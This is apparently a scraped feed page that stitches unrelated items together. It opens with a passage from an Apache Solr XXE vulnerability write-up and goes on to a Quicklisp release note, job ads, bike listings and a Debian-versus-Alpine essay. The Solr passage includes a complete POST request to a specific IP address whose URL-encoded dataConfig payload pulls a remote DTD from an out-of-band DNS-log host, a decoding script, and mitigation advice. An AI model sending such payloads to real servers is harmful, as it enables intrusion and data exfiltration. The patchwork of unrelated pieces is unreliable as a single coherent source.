    String dataConfigParam = (String) requestParams.get("dataConfig");
    if (dataConfigParam != null && dataConfigParam.trim().length() == 0) {
      // If the dataConfig parameter is present but empty, treat it as null
      dataConfigParam = null;
    }
    dataConfig = dataConfigParam;
    
 ......
 
   public String getDataConfig() {
    return dataConfig;
  }
  
 ......
 
}
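For context, a data-config.xml for a MySQL-backed core typically looks roughly like the sketch below (the JDBC URL, table, and field names are illustrative, not taken from the original post):

```xml
<dataConfig>
  <!-- Illustrative MySQL connection; adjust driver/url/credentials to your setup -->
  <dataSource type="JdbcDataSource" driver="com.mysql.jdbc.Driver"
              url="jdbc:mysql://localhost:3306/mydb" user="solr" password="secret"/>
  <document>
    <!-- One entity per table/query whose rows become Solr documents -->
    <entity name="item" query="SELECT id, title FROM items">
      <field column="id" name="id"/>
      <field column="title" name="title"/>
    </entity>
  </document>
</dataConfig>
```

The XXE issue arises because the same configuration can also be supplied inline via the dataConfig request parameter, where it is parsed as attacker-controlled XML.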

Based on the request above, you can append the dataConfig parameter yourself, so the actual vulnerability test request is:

POST /corename/dataimport?_=1531279910257&indent=on&wt=json HTTP/1.1
Host: 61.133.214.178:9983
Content-Length: 282
Accept: application/json, text/plain, */*
Origin: http://www.nxadmin.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Content-type: application/x-www-form-urlencoded
Referer: http://www.nxadmin.com/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

command=full-import&verbose=false&clean=false&commit=false&optimize=false&core=xxetest&dataConfig=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+%22http%3A%2F%2Fsolrxxe.8ug564.ceye.io%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E

The above is the test payload provided by the author of the vulnerability report; a DNS log is used to prove the vulnerability exists, as shown in the image:
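Since the payload in the request body is URL-encoded, it is hard to read at a glance; a quick sketch using Python's standard urllib to decode it (the encoded string below is copied from the captured request):

```python
# Decode the URL-encoded dataConfig value from the captured request
# to see the raw XML that reaches Solr's DataImportHandler.
from urllib.parse import unquote_plus

encoded = (
    "%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E"
    " %3C!DOCTYPE+root+%5B%3C!ENTITY+%25+remote+SYSTEM+"
    "%22http%3A%2F%2Fsolrxxe.8ug564.ceye.io%2Fftp_xxe.xml%22%3E%25remote%3B%5D%3E"
)
decoded = unquote_plus(encoded)  # '+' becomes a space, %XX sequences are decoded
print(decoded)
# → <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root
#   [<!ENTITY % remote SYSTEM "http://solrxxe.8ug564.ceye.io/ftp_xxe.xml">%remote;]>
```

The decoded document defines an external parameter entity pointing at an attacker-controlled URL; when Solr's XML parser resolves it, the resulting out-of-band request confirms the XXE.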

[image: DNS log records showing the out-of-band callback]

0x03 Remediation & Mitigation

1. Upgrade to 6.6.3 or 7.3;

2. Alternatively, restrict the Solr Admin console to the internal network;

3. Taking 6.0.1 as an example, you can put HTTP 401 authentication in front of the console. 6.0.1 ships with no authentication by default, so anonymous users can reach the admin console directly, and authentication must be configured separately. When doing so, make sure every relevant feature request URL is covered by the 401 requirement; otherwise an attacker may bypass it by requesting the feature URLs directly.


          Quicklisp news: July 2018 Quicklisp dist update now available
Hi everyone! There's a new Quicklisp update for July, and regular updates should resume on a monthly schedule.

I'm using a new release system that involves Docker for easier build server setup and management. It took a while to get going but it should (eventually) make it easier for others to run things in an environment similar to mine. For example, it has all the required foreign libraries needed to compile and load everything in Quicklisp.

Here's the info for the new update:

New projects:
  • april — April is a subset of the APL programming language that compiles to Common Lisp. — Apache-2.0
  • aws-foundation — Amazon AWS low-level utilities — BSD
  • binary-io — Library for reading and writing binary data. — BSD
  • cl-bip39 — A Common Lisp implementation of BIP-0039 — MIT
  • cl-bnf — A simple BNF parser. — MIT
  • cl-generator — cl-generator, a generator implementation for common lisp — MIT
  • cl-patterns — Pattern library for algorithmic music composition and performance in Common Lisp. — GNU General Public License v3.0
  • cl-progress-bar — Display progress bars directly in REPL. — MIT
  • clad — The CLAD System. — BSD
  • concrete-syntax-tree — Library for parsing Common Lisp code into a concrete syntax tree. — FreeBSD
  • definitions — General definitions reflection library. — Artistic
  • eclector — A Common Lisp reader that can adapt to different implementations, and that can return Concrete Syntax Trees — BSD
  • flute — A beautiful, easily composable HTML5 generation library — MIT
  • froute — An Http routing class that takes advantage of the MOP — MIT
  • language-codes — A small library mapping language codes to language names. — Artistic
  • lichat-ldap — LDAP backend for the Lichat server profiles. — Artistic
  • multilang-documentation — A drop-in replacement for CL:DOCUMENTATION providing multi-language docstrings — Artistic
  • multiposter — A small application to post to multiple services at once. — Artistic
  • sandalphon.lambda-list — Lambda list parsing and usage — WTFPL
  • sel — Programmatic modification and evaluation of software — GPL 3
  • system-locale — System locale and language discovery — Artistic
  • taglib — Pure Lisp implementation to read (and write, perhaps, one day) tags — UNLICENSE 
  • terrable — Terragen TER file format reader — Artistic
  • tooter — A client library for Mastodon instances. — Artistic
  • trace-db — Writing, reading, storing, and searching of program traces — GPL 3
  • umbra — A library of reusable GPU shader functions. — MIT
Updated projects: 3d-matrices, 3d-vectors, agnostic-lizard, alexa, aws-sign4, base-blobs, bodge-blobs-support, bodge-chipmunk, bodge-nanovg, bodge-nuklear, bordeaux-threads, bt-semaphore, caveman, cepl, cepl.drm-gbm, cerberus, chirp, cl-algebraic-data-type, cl-async, cl-autorepo, cl-cognito, cl-conllu, cl-darksky, cl-flow, cl-forms, cl-gamepad, cl-geos, cl-gobject-introspection, cl-gopher, cl-hamcrest, cl-interpol, cl-liballegro, cl-libsvm-format, cl-mechanize, cl-mpi, cl-muth, cl-online-learning, cl-pslib, cl-python, cl-random-forest, cl-readline, cl-redis, cl-rules, cl-sdl2, cl-str, cl-toml, cl-yesql, clack, claw, clip, closer-mop, closure-html, clss, clx, codex, coleslaw, common-lisp-actors, configuration.options, croatoan, curry-compose-reader-macros, delta-debug, deploy, dexador, djula, dml, documentation-utils, documentation-utils-extensions, doubly-linked-list, dufy, dynamic-mixins, elf, fare-scripts, femlisp, fft, flare, flexi-streams, for, freebsd-sysctl, fxml, gamebox-frame-manager, gamebox-math, glsl-spec, glsl-toolkit, glyphs, golden-utils, graph, gsll, harmony, helambdap, hunchensocket, ironclad, jose, lichat-protocol, lichat-serverlib, lichat-tcp-server, lisp-chat, listopia, maiden, mcclim, media-types, mito, nineveh, omer-count, opticl, overlord, oxenfurt, parachute, parseq, parser.ini, pathname-utils, pgloader, physical-quantities, plump, postmodern, ppath, pythonic-string-reader, qbase64, qlot, qt-libs, qtools, random-sample, rove, rtg-math, s-dot2, serapeum, shadow, simple-flow-dispatcher, slime, spinneret, staple, string-case, stumpwm, sxql, the-cost-of-nothing, trivia, trivial-ldap, trivial-mmap, ubiquitous, uiop, unit-formula, varjo, websocket-driver, whofields, xhtmlambda, xlsx, xml-emitter.

Removed projects: binge, black-tie, cl-ctrnn, cl-directed-graph, cl-ledger, cl-scan, readable, spartns.

The projects removed either didn't build (cl-directed-graph) or are no longer available for download that I could find (everything else).

To get this update, use (ql:update-dist "quicklisp").

Enjoy!


          LXer: How to set up Apache Virtual Hosts on Debian 9
Published at LXer: In this tutorial, we will show you how to set up Apache virtual hosts on Debian 9. Apache is a free and open source web server. It is the most popular and widely used web server...
           2013 TVS Apache RTR 40000 Kms
Price: ₹ 27,500, Model: Apache RTR, Year: 2013 , KM Driven: 40,000 km,
Urgent sale interested call me 70929862.12 no chat don't waste my time https://www.olx.in/item/2013-tvs-apache-rtr-40000-kms-ID1lNcRh.html
           2011 TVS Apache RTR 80000 Kms
Price: ₹ 20,000, Model: Star City Plus, Year: 2011 , KM Driven: 80,000 km,
Bike is in very good condition. https://www.olx.in/item/2011-tvs-apache-rtr-80000-kms-ID1lN5g5.html
          Linux System Administrator - Earth Resources Technology, Inc - Seattle, WA
Apache webserver, Tomcat, BIND, Nagios and Nagvis, Snort, Gitlab, openDCIM, R-cran, ColdFusion, and Commonspot....
From Earth Resources Technology, Inc - Tue, 13 Mar 2018 19:23:29 GMT - View all Seattle, WA jobs
          Web Based Software Developer - 4D Tech Solutions, Inc. - Morgantown, WV
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). 4D Tech Solutions is currently looking for a mid-level Software/Web Developer (4+ years...
From Indeed - Wed, 27 Jun 2018 12:34:02 GMT - View all Morgantown, WV jobs
          Jr. Software Engineer - Leidos - Morgantown, WV
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). Put your Java/C++ skills in action!...
From Leidos - Sat, 07 Jul 2018 12:34:13 GMT - View all Morgantown, WV jobs
          Software Developer - Leidos - Morgantown, WV
Familiarity with NoSql databases (Apache Accumulo, MongoDB, etc.). The Leidos Health Products & Service Group has an opening for a Software Developers with...
From Leidos - Fri, 01 Jun 2018 10:39:46 GMT - View all Morgantown, WV jobs
          GeekList Item: Item for Geeklist "Trimming The Fat 2018 - a US only Math Trade"

by dmb229

An item Board Game: Thunderbolt Apache Leader has been added to the geeklist Trimming The Fat 2018 - a US only Math Trade
          nginx conf to write for streaming
I have to send in db all the video recordings for each user (from nginx conf). if you know how to do and you can do work from teamviewer or chrome remote please write in your description: "I can do remote"..... (Budget: €30 - €250 EUR, Jobs: Apache, Linux, Nginx, PHP, Ubuntu)
          Building Mobile Apps With Capacitor And Vue.js
Recently, the Ionic team announced an open-source spiritual successor to Apache Cordova and Adobe PhoneGap, called Capacitor. Capacitor allows you to build an application with modern web technologies and run it everywhere, from web browsers to native mobile devices (Android and iOS) and even desktop platforms via Electron — the popular GitHub platform for building cross-platform desktop apps with Node.js and front-end web technologies. Ionic — the most popular hybrid mobile framework — currently runs on top of Cordova, but in future versions, Capacitor will be the default option for Ionic apps.
          Comparing Debian vs Alpine for container & Docker apps

Background: For TurnKey 15 (codenamed TKLX) we're evaluating a change of architecture from the current generation of monolithic systems to systems as collections of container based micro-services. Essentially the service container replaces the package as the highest level system abstraction.

There are several layers to the new architecture, but the first step is to figure out the best way to create the service containers. Alon has been quietly working on this for the last couple of months and managed to slim down Debian to 12MB compressed for the base image:

https://github.com/tklx/base

https://hub.docker.com/r/tklx/base/

With Anton's help we added PoC tklx containers for Mongodb, Nginx, Postgres, Apache, Django and others:

https://github.com/tklx

https://hub.docker.com/u/tklx/

So far the most thought provoking question we've received is: why are we using Debian for this instead of Alpine Linux, the trendy minimalist upstart blessed by the powers at Docker?

That is a very good question, and it deserves a good answer.

Alpine Linux has its roots in LEAF, an embedded router project, which was in turn forked from the Linux Router on a Floppy project.

As far as I can tell Alpine would have stayed on the lonely far fringe of Linux distributions if not for Docker. I suspect a big part of Docker's motivation for adopting Alpine was the petabytes of bandwidth they could save if people using Docker didn't default to using a fat Ubuntu base image.

Debian is superior compared to Alpine Linux with regards to:

  • quantity and quality of supported software
  • the size and maturity of its development community
  • amount of testing everything gets
  • quality and quantity of documentation
  • present and future security of its build infrastructure
  • the size and maturity of its user community, number of people who know its ins and outs
  • compatibility with existing software (libc vs musl)

Alpine Linux's advantages on the other hand:

  • it has a smaller filesystem footprint than stock Debian.
  • it's slightly more memory efficient thanks to BusyBox and the musl library

Alpine touts security as an advantage, but aside from defaulting to a grsecurity kernel (which isn't an advantage for containers) they don't really offer anything special. If anything, the small size and relative immaturity of the Alpine dev community makes it much more likely that their infrastructure and build systems are compromised. Debian is also at risk, but there are more eyes on the prize, and they're working to mitigate this with reproducible/deterministic builds, which isn't on Alpine's roadmap and may be beyond their resources.

Though Alpine advertises a range of benefits the thing its dev community seems to obsess about the most is size. As small as possible.

Regarding the footprint, Alon showed you can slim down Debian so the footprint advantage is small. If that isn't enough we can take it one step further and use Debian Embedded to slim things down further by using BusyBox, and smaller libc versions, just like Alpine.

Choosing Alpine over Debian for this use case trades off people-oriented advantages that increase in value over time (skilled dev labour, bug hunters, mindshare, network effects) for machine-oriented advantages (storage and memory) that devalue rapidly thanks to Moore's Law.

I can see Alpine's advantages actually mattering in the embedded space circa 2000, but these days Debian runs fine on the $5 Raspberry Pi Zero computer, while the use cases Alpine is actually being promoted for are servers with huge amounts of disk space and memory by comparison.

Maybe I'm missing something but doesn't that seem awfully short sighted?

OTOH, I can see how from Docker's POV, assuming bandwidth isn't getting cheaper as fast as storage or memory, and they're subsidizing petabytes of it, swinging from the fattest image to the slimmest image could help cut down costs. I bet Docker also likes that they can have much more influence over Alpine after hiring its founder than they could ever hope to have over a big established distribution like Debian.

Summary of Debian pros:

  • vastly larger dev & user community   
    • more packages   
    • more testing   
    • more derived distributions   
    • more likely to still be in robust health in 10 years
  • working towards reproducible builds
  • better documentation
  • libc more compatible than musl, less likely to trigger bugs
  • more trustworthy infrastructure

Summary of Alpine pros:

  • lighter: community obsessed with footprint
  • musl: more efficient libc alternative
  • simpler init system: OpenRC instead of systemd
  • lead dev & founder is a Docker employee
  • trendy

          #canon6d - modagrafias
Tomorrow morning has opened up for me... If anyone wants a photo shoot in Santander or the surrounding area, just say so... #modelo #modeloftheday #modeling #model #modafemenina #moda #fashion #belleza #beauty #sesiondefotos #chemapacheco #sesion #session #photosession #mujer #woman #canonphotography_official #canonphotography #canon #canon6d #glamour #fotografía #fotodeldia #foto #photography #photooftheday #photo #photograph #cantabria
           Apache CouchDB 2.1.2
A database that uses JSON for documents, JavaScript for MapReduce queries and regular HTTP for an API [...]

          Telecommute Data Engineer
An information technology company is in need of a Telecommute Data Engineer.

Core responsibilities include:
  • Using Spark to analyze terabytes of event and entity data
  • Tracking and using dimension history in the company's analytics pipelines
  • Handling, sorting, and rolling up the events from mobile, web, and backend systems

Required skills:
  • Consistently shipped high-quality code to production as part of a team
  • Strong foundation in computer science, especially in the storage and retrieval of large data sets
  • Ability to work with large, complex data schemas
  • Strong knowledge of SQL and familiarity with data warehousing technologies
  • Proficiency in writing, deploying, and debugging data pipelines using Apache Spark
  • Significant experience with two or more programming languages
          Administrateur système senior - NOVIPRO - Montréal, QC
Knowledge of Windows Server 2003/2008/2012/2012 R2 Standard and Enterprise editions; knowledge of IIS 6.0, 7.0, or 8.0, or Apache web servers;...
From NOVIPRO - Sat, 07 Jul 2018 00:52:11 GMT - View all Montréal, QC jobs
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Manager – Big Data, AWS Elastic MapReduce (EMR) - Amazon.com - Seattle, WA
Amazon EMR is a web service which enables customers to run massive clusters with distributed big data frameworks like Apache Hadoop, Hive, Tez, Flink, Spark,...
From Amazon.com - Mon, 02 Jul 2018 08:17:21 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 20 Jun 2018 01:20:13 GMT - View all Seattle, WA jobs
          Software Development Engineer - Amazon Web Services - Amazon.com - Seattle, WA
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Mon, 18 Jun 2018 19:27:06 GMT - View all Seattle, WA jobs
          Senior Mobile QA Engineer - Hallmark - Santa Monica, CA
Familiarity with performance tuning applications with tools like JMeter or Apache Bench is a plus. Believe quality not only involves the end user functionality...
From Hallmark - Wed, 11 Jul 2018 20:16:04 GMT - View all Santa Monica, CA jobs

